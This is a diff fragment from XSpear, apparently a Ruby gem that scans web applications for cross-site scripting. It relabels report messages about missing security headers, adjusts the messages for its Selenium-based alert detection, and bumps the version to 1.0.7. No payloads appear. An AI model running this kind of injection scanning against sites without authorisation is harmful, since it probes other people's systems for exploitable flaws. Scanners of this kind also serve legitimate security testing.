82
82
  end
83
83
 
84
84
  if @response['Strict-Transport-Security'].nil?
85
85
  # HSTS
86
- @report.add_issue("i","s","-","-","original query","Not set HSTS")
86
+ @report.add_issue("i","s","-","-","<original query>","Not set HSTS")
87
87
  end
88
88
 
89
89
 
90
90
  if !@response['Content-Type'].nil?
91
- @report.add_issue("i","s","-","-","original query","Content-Type: #{@response['Content-Type']}")
91
+ @report.add_issue("i","s","-","-","<original query>","Content-Type: #{@response['Content-Type']}")
92
92
  end
93
93
 
94
94
 
95
95
  if !@response['X-XSS-Protection'].nil?
96
- @report.add_issue("i","s","-","-","original query","Not set X-XSS-Protection")
96
+ @report.add_issue("i","s","-","-","<original query>","Not set X-XSS-Protection")
97
97
  end
98
98
 
99
99
  if !@response['X-Frame-Options'].nil?
100
- @report.add_issue("i","s","-","-","original query","X-Frame-Options: #{@response['X-Frame-Options']}")
100
+ @report.add_issue("i","s","-","-","<original query>","X-Frame-Options: #{@response['X-Frame-Options']}")
101
101
  else
102
- @report.add_issue("l","s","-","-","original query","Not Set X-Frame-Options")
102
+ @report.add_issue("l","s","-","-","<original query>","Not Set X-Frame-Options")
103
103
  end
104
104
 
105
105
 
@@ -112,12 +112,12 @@ class XspearScan
112
112
  d = c.split " "
113
113
  r = r+d[0]+" "
114
114
  end
115
- @report.add_issue("i","s","-","-","original query","Set CSP(#{r})")
115
+ @report.add_issue("i","s","-","-","<original query>","Set CSP(#{r})")
116
116
  rescue
117
- @report.add_issue("i","s","-","-","original query","CSP ERROR")
117
+ @report.add_issue("i","s","-","-","<original query>","CSP ERROR")
118
118
  end
119
119
  else
120
- @report.add_issue("m","s","-","-","original query","Not Set CSP")
120
+ @report.add_issue("m","s","-","-","<original query>","Not Set CSP")
121
121
  end
122
122
 
123
123
 
@@ -172,17 +172,17 @@ class XspearScan
172
172
  alert = driver.switch_to().alert()
173
173
  if alert.text.to_s == "45"
174
174
  driver.quit
175
- return [true, "found alert/prompt/confirm (45) in selenium!! #{@query}\n => "]
175
+ return [true, "found alert/prompt/confirm (45) in selenium!! #{@query}"]
176
176
  else
177
177
  driver.quit
178
- return [true, "found alert/prompt/confirm event in selenium #{@query}\n =>"]
178
+ return [true, "found alert/prompt/confirm event in selenium #{@query}"]
179
179
  end
180
180
  rescue Selenium::WebDriver::Error::UnexpectedAlertOpenError => e
181
181
  driver.quit
182
- return [true, "found alert/prompt/confirm error base in selenium #{@query}\n =>"]
182
+ return [true, "found alert/prompt/confirm error base in selenium #{@query}"]
183
183
  rescue => e
184
184
  driver.quit
185
- return [false, "not found alert/prompt/confirm event #{@query}\n =>"]
185
+ return [false, "not found alert/prompt/confirm event #{@query}"]
186
186
  end
187
187
  end
188
188
  rescue => e
metadata CHANGED
@@ -1,7 +1,7 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: XSpear
3
3
  version: !ruby/object:Gem::Version
4
- version: 1.0.6
4
+ version: 1.0.7
5
5
  platform: ruby
6
6
  authors:
7
7
  - hahwul